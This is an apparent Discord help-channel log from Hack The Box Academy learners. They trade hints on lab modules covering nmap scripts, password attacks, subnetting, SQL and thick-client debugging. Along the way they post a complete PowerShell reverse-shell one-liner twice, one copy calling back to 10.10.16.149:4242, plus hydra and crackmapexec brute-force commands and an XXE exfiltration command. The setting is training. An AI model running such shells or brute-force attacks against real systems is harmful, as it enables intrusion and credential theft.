Hours? It shouldn't take that long for any scan, unless you're doing a UDP scan.
cause it is directly connected to the HTB network, and as rat suggested unless you're doing a UDP scan shouldn't take that long of course there are other factors to take in consideration
Accessing content from Windows BitLocker encrypted partition in a vhd file on Linux
Thanks, but that was one of the first things I tried. Every time I try and get the tools all I get is "failed to fetch http://.kali.org/.../tool-name" it has done that on my kali vm and the parrot box
I used that to make it work. Which tool is coming up with the error?
The very first one "qemu-utils"
That is at least on my kali box. On the parrot box I can get up to "modprobe nbd" where it says "modprobe: ERROR: could not insert 'nbd': Operation not permitted"
Did you run into any issues when you did this? Now I am getting hung up on the command "qemu-nbd -c /dev/nbd0 <PATH_TO_FILE>.vhd"
sudo apt install qemu-utils cryptsetup ntfs-3g-dev -y works fine.
as long as the file exists in your location, it should work.
My new error. Farther than I've gotten previously
Open a PS instance as Administrator
I am having trouble with "sudo dislocker /dev/loop0p2 -u(password) -- /media/bitlocker"
When I replace (password) with the password I cracked it then asks me for the user's password. I never gave it a user so where would it be getting that from? And then it says the keys I have given cannot be used for decrypting keys
can someone help me with that?
NSE is nmap script engine
ya i know, but i dont understand what do i need to find
The flag
probably use -Sc for scripts
🤯
tried too
do you have any space between the -u and your password? if yes then that's the issue
one of the services is like one of the ports?
omg I needed to put "http://" before the ip for the ffuf module
-sV is a good option for nmap too @carmine trench
i dont know what do i need to look for, like how does the flag looks like
-sV will probe open ports to determine service/version info
the question is asking for a flag in one of the services, maybe something that looks odd
whats your command look like?
i did that, and it doesn't show me the version of port 31337
nmap [target] -sV -p-
you didnt use a script
Services are running on ports.. one of the services contains a flag, you get it using NSE
In order to understand how to use NSE read (again) the NSE section
i dont know which script to use, there is a lot😫
Why are you even surprised? The protocol is not an optional part of the URL, you probably just got used to your browser automatically selecting it for you, but in terminal there is no reason not to specify it when working with a website
I usually get an error at least
ffuf ran like nothing was wrong
I tried both. With the space prompts for the password again, without doesn’t, but the error happens both times. Is it actually pointing it to the file? I’m not understanding how it knows what file as only the command before states the actual file
send a screenshot of the command you run and the error that you get
tried to do something and i got this
am i on to something?
hi guys, im doing the windows pe module, and im in the pillaging section. Can someone give me a nudge about the last question ( i have the SAM, SYSTEM and Security, but i dont know why secretsdump doesnt work...)
did you run --script vuln?
you want that too
I did , this was the result
read the results
it gives you vulnerabilities you should check
there should be more below the screenshot right?
in your screenshot, the "http-slowloris-check:" is a vulnerability
there should be another
http-slowloris-check:
http-dombased-xss:
http-stored-xss:
http-enum:
http-csrf:
hope that makes sense
Hey yall, im working on the new module for NTA, and im not sure what im doing wrong here. The question is this: Inspect the ARP_Poison.pcapng file, part of this module's resources, and submit the total count of ARP requests (opcode 1) that originated from the address 08:00:27:53:0c:ba as your answer. I am using the filter: || arp.opcode == 1 && (eth.src == 08:00:27:53:0c:ba) || and I am getting the result || 507 || from the wireshark statistics page, but that is not the answer?
Blocked out password, but there is no space
Why is Intermediate Network Traffic Analysis easy while Intro to Network Traffic Analysis is medium?
someone at HTB make an oopsie woopsie
shoot me a dm i'll help you troubleshoot
*working fine for me
Yo when did they release this
Earlier Today
Good
the first screenshot is clearly a connection error so the target smb may have crashed try reset your target
and on the second screenshot that user is active but doesn't have rdp (that user is for other services)
yep
for RDP i used hydra
hydra -L username.list -P password.list -f rdp://10.129.6.188 -t 4
yo guys any help with the active subdomain enumeration lab, im on the question where you have to submit the contents of the txt record. i got chatgpt to write me a bash script to iterate through the list of domains i got earlier on but i keep getting no txt record found, any push in the right direction much appreciated
i think it's the threads
first ask a better question next time, don't just say i'm on the lab and the chat GPT script doesn't work, which module and section are you on? what did you try and what failed? and secondly quick reminder that HTB academy modules are paid content which you can't just post on chatGPT or other AI platforms
and hint on question do a dns zone transfer and look for ||domains with similar ips||
this is what i asked chatgpt no paid content was posted
no
slowloris attack is to take down the ip
lovely
I was supposed to know that? because they didn’t talk about that in the page
Im so confused with this module like there is a bunch of stuff that i need to use to get an answer but they dont mention it in the module
which module and section are you on?
tell me about it
Basic Toolset i think
Im in the nmap module right now
literally they showed u the website
@carmine trench if you are on the Nmap Scripting Engine section of the nmap module then you and the other guy have completely gone off track a while back
to check for scripts
??
how
these and the vuln script don't have anything to do with the section
But how do i know what to search?
spoiler for god sake
no idea how or why you got the file with the vuln script
--script vuln lists all the vulnerabilities
But why did you search http? And not ssh or xss or something like that
Im lost😭
then read the section again
use --script vuln
what is the sense of telling him run this command
if he doesn't even know what is that for
it identifies vulnerabilities
and shows where the flag is
Idk why but my hints don't work
Hey all, I need a nudge in the below if possible
Module: Password Attacks
Chapter: Password Attacks Lab - Hard
Issue: I'm trying to brute force J using the following commands (at the same time) but it's taking a long time which makes me doubt that I'm on the right track
||crackmapexec winrm IP -u "J" -p mut_password.list --local-auth||
||crackmapexec winrm IP -u "j" -p mut_password.list --local-auth||
||crackmapexec winrm IP -u "J" -p password.list --local-auth||
||crackmapexec winrm IP -u "j" -p password.list --local-auth||
hint try ||RDP||
but is it J or j ?
it doesn't care
using mut ?
noted
yep
noted, will try ||hydra -l j -P mut rdp://IP|| now thanks
although there is a good bit of services running on this target the section hint points you to the target web server so that's why you need to use http scripts
Ohhhh
even though nmap is literally the last tool i would use for a web server but hint try to look for a script that is for enum first
facts
Got ya
and like the other guy said the vuln script in theory could work but it's just a script that runs other scripts so if you don't even know what a script does there is almost no point of running it just to get the answer
but in your previous screenshot i'm guessing that didn't work
he didnt post the full results
so it could be that he got the answer all of this time 🤣
without even knowing what he was doing
it's taking a lot of time as well using this command hmmmm
I reached 800 of 94045
hint you are close to the cred
you were right, cheers
nice 👍
@elfin cedar which tools do you use to search for xss, csrf, stored xss enum
also quick note i just help someone with the last part of this lab so if you do need help with that part scroll up a bit 😉
Awesome, thanks again
xsstrike
unless you have -v on i belive it does
I'm cracking on through the tier 0 modules of the academy
im not sure what module you're doing but hydra RDP is a little funny when you start putting a lot of threads on,
hello everyone, I want to ask about the Attacking Common Applications Module.
In the PRTG Network Monitor section's questions it is said that I can get a reverse shell, I've tried different ways to obtain one but i couldn't
i used this powershell one liner:
$client = New-Object System.Net.Sockets.TCPClient('10.10.16.149',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
But when i get the rev shell it isn't responsive
and then it just disconnects.
I thought abt it being terminated by the App itself, which might be viable, but it doesn't make a lot of sense
Have you tried one from here: https://revshells.com/
Is anyone here doing the new Network Traffic module?
didn't do that one yet
i will try to make a rev shell file and download it on the machine, I'll see what turns up
Not yet. I'm making very slow progress in the SOC Analyst path. 🙈
i got it, i made a metasploit reverse shell, uploaded the file on the target, and ran it.
"Submit the broadcast address of the following CIDR: 10.200.20.0/27"
Super confused on how the answer is 31. Anyone able to ELI5?
reread the section 2 times now and it's just not clicking
if u calculate the range of this subnet, you will get the following:
Network Address: 10.200.20.0
Hosts: 10.200.20.1 - 10.200.20.30
BC Address: 10.200.20.31
Every subnet contains 32 hosts, subtracting both the network address and the BC u get 30 usable address.
The BC address is a special type of address, so it's reserved in the last usable address in the subnet.
a /27 has 32 addresses, so if you find the network address of that, you can then work out the broadcast address being the last available IP address.
in this instance the network is 10.200.20.0, with the usable address 20.1-20.30 with the broadcast on 31
I would have a look at how networks and subnets work using XOR online somewhere and then once you have got your head round whats happening theres lots of cheat sheets online to refer to quickly
Think my brain is just too worn out to continue learning today... even that simple explanation is just beyond my comprehension right now.
Thank you for explaining, I'll come back tomorrow and try to see if my brain isn't melted ice cream then.
Hy all, quick question on the SQL Operators lab in the SQL injection fundamentals section, currently banging my head against the wall on trying to craft a query that does not include 'engineer' in the title at all
Thought i had it, but titles that still include engineer are returning, but titles with only engineer in it are excluded. Any sort of nudge one can provide?
Here is an example query ive tried but hasn't worked:
Dumb question I'm sure but please humor me.
So... if I'm understanding subnets correctly, a /27 has 32 available because it's basically 128+64+32 = 224, then 256 total - 224 = 32 available... so why are the usable addresses .1-.30 instead of .224-.254? Is it simply because the extra addresses are just removed entirely or are they reserved elsewhere?
disregard, % was a game changer
can anyone help me with that powershell oneliner ?
You can have multiple subnets within the range, so you can have 0-31 32-63 etc. In this case the host is .0 meaning the addresses are 0-31. The easiest way to understand this is to find some video that explains classes subnetting on YouTube. Then you'll see how the maths side of it works
DM me
Ah. So it just begins at the host... duh. Right. Sorry, my brain really is just trashed right now lol
In the final octet the subnet is: 11100000. So using xor you can have a host of:
00000000
00100000
01000000
01100000 etc.
Or 0, 32,64,96 etc....
The broadcast is always going to be the top address in the 32 addresses
Yeah, makes sense now. For some reason I was just overlooking the obvious there lol
for those who are searching, I used this powershell oneliner with no error: $client = New-Object System.Net.Sockets.TCPClient('<IP>',<PORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
thx i dont know so much about Discord
The question specifies two conditions to meet, one is that the employee number is greater than 10000 or their title doesn't contain engineer
so crafting the first condition will be a simple greater than operator, then comes the OR part, then you craft the doesn't contain engineer part.
It's mentioned in the previous section how to search for a specific word using the LIKE clause.
check that again and if u didn't figure it out I'll be happy to assist
didn't notice this one, my bad
guys, what is the best module to start with if im new to cyber?
(i wish i asked it earlier because i already start with basic toolset, but i still want know what my next module will be)
hello everyone, quick question for those who finished the attacking common apps module, im stuck at the gitlab Enum section question, where they want me to enumerate the version number, i found the version number throughout the help page, but it's incorrect, if anyone can nudge me in the right direction it would be appreciated
try to go with the information security foundations path at first, as it gives u a grasp over common concepts
then from there im pretty sure you'll figure ur way around
nvm i found it while digging around in a registered account.
Aye Aye, I created a post in the community-help
oke oke, goodluck
Anybody can tell me why I can't find the 0000000000003000 | MAP | -RW-- in "Attacking Thick Client Applications"? It's driving me nuts 💀
@slender shoal What do you mean? Isn't this as they explain it 🥺
hey
i'm doing the password attacks. Module Attacking Active Directory & NTDS.dit
i'm given an IP but no creds to login to enumerate the service
any idea what i'm supposed to do
hello anyone can let me know if the cracked Kira's passwd changed?, cuz I'm trying to connect as described on the question in Protected files at Password Attack module?
The name is in the title
ok.
they didn't teach in the module how to attack more so, they told me how to retrieve NTDS.dit to crack the hashes offline
I got web shell working, and can traverse directories. Looking from c: on through the hierarchies, I do not see anything with flag in it. Do I need to do a reverse shell or can I traverse, and just missing the path?
But that's not the question being asked. They are literally just asking you the name of the file that stores the password hashes for the domain.... which is stated in the reading material, about half way down the page.
I did it but, the weird thing is I found the same password as previous.... trying 1 + time with other dictionary
Combination of both iirc
hello everyone, I have a question regarding the Attacking Common Apps module, Section Attacking CGI Apps - ShellShock.
In the section it mentions that the User-Agent Header is vulnerable to command injection, but it doesn't show how we got to that or how to enumerate it effectively, if anyone has a blog or a guide or anything that might help with understanding how we got to this.
Just follow the examples, it works.
Hi @fathom pendant. Regarding the question in Attacking Common Services easy lab "You are targeting the inlanefreight.htb domain. Assess the target server and obtain the contents of the flag.txt file. Submit it as the answer." I tried the following:
- Used the smtp-user-enum tool and found a username starting with f.
- found what appeared to be default credentials, first tried to login with them using mysql but was not successful an error appeared citing that the password field was empty.
- tried brute forcing each username found with the password list provided in the resources section on the ftp and mysql ports but this was also unsuccessful.
I saw the mysql reverse shell discussion and correct me if I am wrong. I need to be authenticated before attempting this? or does it work straight from the url bar? Any hints would be appreciated 🙂
yes ik that it works, but i wanna know how.
I used ncrack to get the un/pw. Look through the forums for the web shell parts as well as the sql module. I am at the web shell part right now, trying to traverse to find the flag, but not sure that's one way to do it, or if I need to do a reverse shell. I think I am almost at the finish with this module.
Do your own research then 🙂
i was asking if someone does know a blog or a guide, it doesn't mean im not doing my own research, uk u could've just ignored my question and went on :)
quick update, just found the flag. if you have questions as to how I approached it you can DM me. Feels like there might be a couple ways to get the flag.
does anyone have any experience with kubeletctl ? i get this error when running it. Error: unknown flag: --certificate-authority
the command im running is:
kubeletctl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 pods
Hello. I am working on the Cracking Wireless (WPA/WPA2) Handshakes with Hashcat module. My problem is with Question 1: Perform MIC cracking using the attached .cap file. I have followed the instructions in the module. I used cap2hccapx.bin to create a file with the handshakes called mic_to_crack.hccapx. I used hashcat, with -m 22000, to crack it. But hashcat always exhausts.
Any tips on what I'm doing wrong? I'm using pwnbox, not kali.
hashcat version is 6.1.1.
my apologies, u were right..!!!
i remember this question i think it was a different -m number the old deprecated one worked for me i can look it up for you
crack Kira passwd
I tried the old -m, 2500, and it still got exhausted.
yea i think i used that one and --deprecated-check-disable
Interesting, I'll try that, thank you.
i have a bad memory but i remember this cuz after i figured it out i told support about it that it didn't work unless i used that one
Obtain credentials first via smtp then figure out the rest
thenas, did you use --deprecated-check-disable on hashcat, or on cap2hccapx.bin?
Hashcat with -m 2500
Thank you for the tip. Unfortunately, it is still not working for me.
Dm me mate
as i said i have very bad memory but we can figure it out hopefully i have the message i sent to support
hello i am on WEB ATTACKS module on Blind Data Exfiltration
room trying to use XXEinjector but its not working with me
ruby XXEinjector.rb --host=127.0.0.1 --httpport=8080 --file=/tmp/xxe.req --path=/etc/passwd --oob=http --phpfilter
keep giving me
[-] Specified TCP ports already in use.
i am using python http.server to listen can someone help me tell me what i am doing wrong
Code lines are triple backticks, not single quotes BTW (`)
Like this
my bad
It's alright
quick question
how can i freeze the memory map in x64dbg, the memory map keeps changing and i couldn't figure out how to catch the memory to dump it.
if anyone has any experience with it it'll be appreaciated
appreciated**
I'm stuck at it unable to dump the memory.
this is rly frustrating ngl
hello I would appreciate any hint to start hard lab of attacking common services, I tried to brute force with different list but no result, any hint?
I feel so stupid
What am I missing?
when I try to ssh I get the error: Permission denied (publickey)
I have the password but why isn't is prompting me for it?
This means that you need the rsa key
It's not an error, just a message
hi
in password attacks module, in the medium lab section, i can't reach the root although i used linpeas.sh, could you hint me because i think there is no information in the whole module to learn that especially for beginners
is that the full error message ?
You are meant to enumerate other services to get the rsa key
in the login brute forcing module??
ssh b.gates@94.237.56.76
The authenticity of host '94.237.56.76 (94.237.56.76)' can't be established.
ED25519 key fingerprint is SHA256:j+yt/5KEcd5ONU/344Wjh/R90Vl8/QvaNaLalC7+48k.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '94.237.56.76' (ED25519) to the list of known hosts.
b.gates@94.237.56.76: Permission denied (publickey).
You need to get the id_rsa, both private and public, and change the mode to be executable.
It will then work.
Once you get these keys, do this.
But the module doesn't even mention this.
I know.
I have the same problem in the Password Attacks module.
Not everything is available.
Anyone have a small hint concerning this question: in the Password Attacks module, in the medium lab section, I can't reach root although I used linpeas.sh. Could you give me a hint? I think there is no information in the whole module to learn that, especially for beginners.
The modules expect some familiarity with Linux environments. You should already have a grasp of the fundamentals before starting.
Yeah, I remember doing the same thing from a previous module.
Respectful 👍
So whenever you ssh into something, you need more than just a password every time?
I will have to go back and redo the ssh module to refresh. I took like 2 weeks off; I was losing my mind.
When you have id_rsa, you can specify it in the ssh command with -i and try with the root username.
Anyone have a small hint concerning this question: in the Password Attacks module, in the medium lab section, I can't reach root although I used linpeas.sh. Could you give me a hint? I think there is no information in the whole module to learn that, especially for beginners.
ssh has more than one method of authentication.
Anyone have a small hint concerning this question: in the Password Attacks module, in the medium lab section, I can't reach root although I used linpeas.sh. Could you give me a hint? I think there is no information in the whole module to learn that, especially for beginners.
😆
My message, sir.
When you have id_rsa, you can specify it in the ssh command with -i and try with the root username.
If you have a valid private key...
you can use it for root...
You mean like this: ssh root@ip -i id_rsa
Wait a few seconds.
Yeah, done.
Need help for the hard lab of Attacking Common Services...
My friend
Sorry
I think the id_rsa is for jason.
It was for mike.
So the question is how can I get the id_rsa from the target machine?
I just have the known_hosts.
jason@skills-medium:~/.ssh$ ls
known_hosts
Are you still there
??
Do ls -la
IT'S RIGGED
What do you mean nothing found? You did ls -la ~/.ssh/ ?
Okay
Which module?
Which part of the medium lab?
Yes
😭
MarcieLee mentioned that. I am at the jason user and want to get root.
Ah
Look for something else aside from ssh
Read the documentation that you got the password from carefully
no puzzles please
It tells you a service which should be running
It's a skills assessment
Wdym how
It's accessible internally
Literally my notes reflect what path I took to escalate to root
My friend, I don't have all the tools. I mean, I don't have all the information.
Sir
Check out your mysql idea.
You have the foothold as jason.
Yeah
How did the module teach you to connect to mysql
(Also looking at the history should show how this user tends to connect to it)
Wait, the history of the user jason?
Sorry it's a previous module, footprinting, that refers to it
Either way Google is also a free resource to figure it out
Yes, I didn't open this module till now, so I can't read it.
But the syntax would be
mysql -u $username -p
Are you just doing random modules or are you following the cpts path
Random.
Also, I don't think there's a big difference
in my opinion.
👍
mysql --user=user_name --password db_name (from another source)
Yes but since it's internal, you don't need to specify the db_name
-u is short for --user and -p is short for --password
The CPTS path takes you through some basic modules before reaching this point.
As mysql is a fairly basic/common service, it's fairly well documented.
Follow the path; you will have a much easier time overall.
CPTS path: could you tell me the full name of the path,
as I have skills and job paths?
Which one?
Really?
Yes
I would recommend the bug bounty path first, as it ties in and shares modules.
Eh it depends
Tbh
I mean, if their goal is just unaimed learning, it's really just up to them.
You can do them in any order
The path is just structured for easier learning
True, there is actually some super helpful stuff at the beginning of the CPTS path as well.
mysql> SHOW databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| users |
+--------------------+
2 rows in set (0.00 sec)
This is what I get.
Right?
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| users |
+--------------------+
2 rows in set (0.00 sec)
mysql> use users;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql>
What is the problem here?
Nothing, just make a query to read the data in the "users" table. There is a module called "SQL Fundamentals" if I'm right, and I don't know if you did it already.
How?
As there is nothing like this.
SQL Injection Fundamentals. This is the name of the module.
Are you still there?
I reviewed it, but there is nothing.
Okay, done.
MANY THANKS TO "MarcieLee", "CrazyHorse302", and "autom4il" for their help 👍
Banned from what?
Your email is banned.
If so, then the only way is to contact technical support.
Reduce the caps usage.
If it has nothing to do with HackTheBox, please reach out to the appropriate game representatives.
I'd like help on the Attacking Thick Client Applications module. Am I supposed to delete the parts of the .bat file that delete the files that are created? If so, how do I do that? The module just says "We can try to retrieve the content of the 2 files, by modifying the batch script and removing the deletion." But it does not say how to modify the batch script. Also, when I load the Restart-OracleService.exe into the debugger, I am not finding the "the map with a size of 0000000000003000 with a type of MAP and protection set to -RW--." Why am I not finding it?
Open the batch script in Notepad.
Awesome! Got it! Will deleting those lines allow me to see the right MAP line in the debugger?
Probably not, I'd have to open the whole lab again to try and troubleshoot it but I don't have time right now 😅
That entire section is based on PivotAPI, so if the instructions in Academy don't make sense, watch the ippsec video on it or read the 0xdf writeup about it
Great! I will have to look that up because the instructions in the module are not helpful... it reminds me of the eLearnSecurity material 🤣. Thanks for the info, @trail leaf!